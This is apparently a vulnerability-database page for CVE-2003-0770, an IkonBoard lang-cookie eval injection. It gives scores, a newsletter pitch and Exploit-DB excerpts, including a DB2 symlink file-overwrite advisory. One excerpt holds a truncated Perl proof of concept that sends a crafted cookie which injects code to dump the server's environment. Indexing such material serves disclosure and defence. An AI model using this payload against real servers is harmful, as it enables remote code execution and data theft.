CVE-2003-0770
published 2003-09-22CVE-2003-0770: FUNC.pm in IkonBoard 3.1.2a and earlier, including 3.1.1, does not properly cleanse the "lang" cookie when it contains illegal characters, which allows remote…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
10.81%
95.3th percentile
FUNC.pm in IkonBoard 3.1.2a and earlier, including 3.1.1, does not properly cleanse the "lang" cookie when it contains illegal characters, which allows remote attackers to execute arbitrary code when the cookie is inserted into a Perl "eval" statement.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ikonboard.com | ikonboard | — | — |
| ikonboard.com | ikonboard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM DB2 db2job - File Overwrite
exploitdb·2003-08-05
CVE-2003-0898 IBM DB2 db2job - File Overwrite
IBM DB2 db2job - File Overwrite
---
source: https://www.securityfocus.com/bid/8344/info
IBM's DB2 database ships with a utility called db2job, installed with permissions 4550 and owned by root.db2asgrp.
It has been reported that db2job writes to a number of files with root privileges. The files written to are created with 0770 permissions (owner, group writeable) and are owned by root.db2asgrp. If a symbolic link is written to, the file pointed to will be overwritten and given these permissions. This can be exploited by local attackers with execute privileges to gain root access by writing malicious data to sensitive files (such as /etc/passwd, /etc/shadow) that have been overwritten.
It should be noted, however, that db2job is allegedly not world-executable by default. The two member
Exploit-DB
IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)
exploitdb·2003-05-05
CVE-2003-0770 IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)
IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)
---
source: https://www.securityfocus.com/bid/7361/info
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard.
#!/usr/bin/perl
#
# Date: 5 May 2003
# Author: snooq [http://www.angelfire.com/linux/snooq/]
#
# Ikonboard 3.1.1 Remote Command Execution PoC
# ============================================
# This bug was found by Nick Cleaton.
#
# For more info and patch, go to:
# http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html
#
# Use at your very
Exploit-DB
IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)
exploitdb·2003-04-15
CVE-2003-0770 IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)
IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)
---
source: https://www.securityfocus.com/bid/7361/info
It has been reported that IkonBoard is prone to an arbitrary command execution vulnerability. The vulnerability is due to insufficient sanitization performed on user supplied cookie data.
An attacker may exploit this issue to execute arbitrary commands in the security context of the web server hosting the vulnerable IkonBoard.
#!/usr/bin/perl -w
use strict;
my $HOST = 'www.example.com';
my $PORT = 80;
my $PATH = '/cgi-bin/ikonboard.cgi';
my $HEAD = qq|"Content-type: text/plain\r\n\r\n"|;
use IO::Socket;
my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!";
my $val =
qq|.\0"if print($HEAD,map"\$_ => \$ENV{\$_}\n",keys\%ENV)&&exit;#|;
$val =~ s#(\W)# s
No writeups or analysis indexed.
2003-09-22
Published